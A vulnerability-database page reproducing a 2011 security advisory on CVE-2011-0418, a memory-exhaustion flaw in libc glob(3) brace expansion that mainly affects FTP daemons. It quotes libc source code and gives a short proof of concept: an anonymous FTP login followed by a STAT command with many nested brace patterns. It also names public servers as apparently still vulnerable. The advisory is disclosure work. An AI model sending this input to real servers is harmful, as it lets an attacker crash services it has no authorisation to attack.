Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT Memory Exhaustion

🗓️ 03 May 2011 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 1428 Views

Multiple Vendors libc/glob GLOB_LIMIT Memory Exhaustion. The function glob() can be exploited to cause memory exhaustion by passing a pattern that expands to a large number of matches. The GLOB_LIMIT option limits the memory used by matches to prevent denial of service attacks

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Multiple Vendors libc/glob(3) Resource Exhaustion (remote ftpd-anon)
8 Oct 201000:00
zdt
0day.today		FreeBSD 9.1 ftpd Remote Denial of Service
5 Feb 201300:00
zdt
FreeBSD		pureftpd -- multiple vulnerabilities
1 Apr 201100:00
freebsd
FreeBSD		FreeBSD -- glob(3) related resource exhaustion
19 Feb 201300:00
freebsd
IBM Security Bulletins		Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities
27 Jun 202422:37
ibm
IBM Security Bulletins		Security Bulletin: Astronomer with IBM is vulnerable to several vulnerabilities
4 Sep 202522:39
ibm
IBM Security Bulletins		Security Bulletin: Astronomer with IBM is vulnerable to several issues due to open source packages
19 Nov 202514:30
ibm
Tenable Nessus		Mac OS X 10.6 < 10.6.8 Multiple Vulnerabilities
23 Jun 201100:00
nessus
Tenable Nessus		OpenSSH < 5.9 Multiple DoS
21 Aug 201900:00
nessus
Tenable Nessus		Mac OS X 10.6 < 10.6.8 Multiple Vulnerabilities
23 Jun 201100:00
nessus
Rows per page
`[ Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory exhaustion ]  
  
Author: Maksymilian Arciemowicz  
http://netbsd.org/donations/  
http://securityreason.com/  
http://cxib.net/  
Date:  
- Dis.: 19.01.2011  
- Pub.: 02.05.2011  
  
CVE: CVE-2011-0418  
  
Affected Software (verified):  
- NetBSD 5.1  
- and more  
  
Original URL:  
http://securityreason.com/achievement_securityalert/97  
  
  
--- 0.Description ---  
#include <glob.h>  
  
int glob(const char *pattern, int flags,  
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);  
  
Description  
  
This function expands a filename wildcard which is passed as pattern.  
  
GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX. This option should be set for programs that can be coerced to a denial of service attack via patterns that expand to a very large number of matches, such as a long string of */../*/..  
  
  
--- 1. Multiple Vendors libc/glob(3) GLOB_BRACE|GLOB_LIMIT memory exhaustion ---  
Analyzing history of GLOB_LIMIT, we should start since 2001, where it has been added to protect ftp servers before memory exhaustion.  
  
http://www.mail-archive.com/[email protected]/msg04960.html  
  
Any 'pattern', should be limited and controlled by GLOB LIMIT. Algorithm used in glob(3) is not optimal, and doesn't support functions like realpath() to eliminate duplicates. It's not easy to predict the greatest possible complexity. Anyway in 2010, netbsd has extended GLOB_LIMIT for a few new limits like: stats, readdir and malloc  
  
OpenBSD has localized some integer overflow. In glob(3) function, exists some malloc() allowing allocate n<INT_MAX bytes into memory.  
  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/glob.c.diff?r1=1.34;r2=1.35;f=h  
  
-globextend()/openbsd--  
749: newn = 2 + pglob->gl_pathc + pglob->gl_offs;  
750: if (pglob->gl_offs >= INT_MAX ||  
751: pglob->gl_pathc >= INT_MAX ||  
752: newn >= INT_MAX ||  
753: SIZE_MAX / sizeof(*pathv) <= newn ||  
754: SIZE_MAX / sizeof(*statv) <= newn) {  
755: nospace:  
756: for (i = pglob->gl_offs; i < (ssize_t)(newn - 2); i++) {  
757: if (pglob->gl_pathv && pglob->gl_pathv[i])  
758: free(pglob->gl_pathv[i]);  
759: if ((pglob->gl_flags & GLOB_KEEPSTAT) != 0 &&  
760: pglob->gl_pathv && pglob->gl_pathv[i])  
761: free(pglob->gl_statv[i]);  
762: }  
763: if (pglob->gl_pathv) {  
764: free(pglob->gl_pathv);  
765: pglob->gl_pathv = NULL;  
766: }  
767: if (pglob->gl_statv) {  
768: free(pglob->gl_statv);  
769: pglob->gl_statv = NULL;  
770: }  
771: return(GLOB_NOSPACE);  
772: }  
-globextend()/openbsd--  
  
however SIZE_MAX and INT_MAX doesn't protect us before memory exhaustion. The real problem here is uncontrolled malloc(3) call. globextend() will be executed a lot of times and we should reduce calls to glob0() and globexp1(). Therefore has been created a new limit, limiting 'braces' used in 'pattern'.   
  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=text&tr1=1.27&r2=text&tr2=1.29  
  
If we don't reduce this call  
  
-globextend()/netbsd--  
static int  
globextend(const Char *path, glob_t *pglob, size_t *limit)  
{  
char **pathv;  
size_t i, newsize, len;  
char *copy;  
const Char *p;  
  
_DIAGASSERT(path != NULL);  
_DIAGASSERT(pglob != NULL);  
  
newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);  
pathv = pglob->gl_pathv ? realloc(pglob->gl_pathv, newsize) :  
malloc(newsize); <==== UNSECURE CALL  
..  
-globextend()/netbsd--  
  
newsize = sizeof(*pathv) * (2 + pglob->gl_pathc + pglob->gl_offs);  
  
malloc(3) try allocate (4*pglob->gl_pathc) bytes.   
  
-PoC-  
USER anonymous  
PASS [email protected]  
STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}  
-PoC-  
  
in result we get  
  
Jan 19 04:49:17 127 /netbsd: UVM: pid 615 (ftpd), uid 1003 killed: out of swap  
  
Many servers are still vulnerable to the above vulnerability and CVE-2010-4754, CVE-2010-4755, CVE-2010-4756, CVE-2010-2632. Servers like ftp.sun.com ftp.sony.com seems still be affected.   
  
  
--- 2. References ---  
http://securityreason.com/achievement_securityalert/89  
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2010-008.txt.asc  
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html  
http://support.avaya.com/css/P8/documents/100127892  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2632  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4754  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4755  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4756  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0418  
  
PoC:  
change 'pattern' in  
http://cxib.net/stuff/glob-0day.c  
  
  
--- 3. Fix ---  
Use CVS netbsd-5 netbsd-5-1 netbsd-5-0  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c  
  
  
--- 4. Greets ---  
Specials thanks for Christos Zoulas, spz  
  
sp3x, Infospec  
  
  
--- 5. Contact ---  
Author: Maksymilian Arciemowicz  
  
Email:  
- cxib {a\./t] securityreason [d=t} com  
  
GPG:  
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
  
http://netbsd.org/donations/  
http://securityreason.com/  
http://cxib.net/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 May 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.12281
libc memory exhaustionglob_limitdenial of serviceglob() functionpattern expansionvulnerability
1428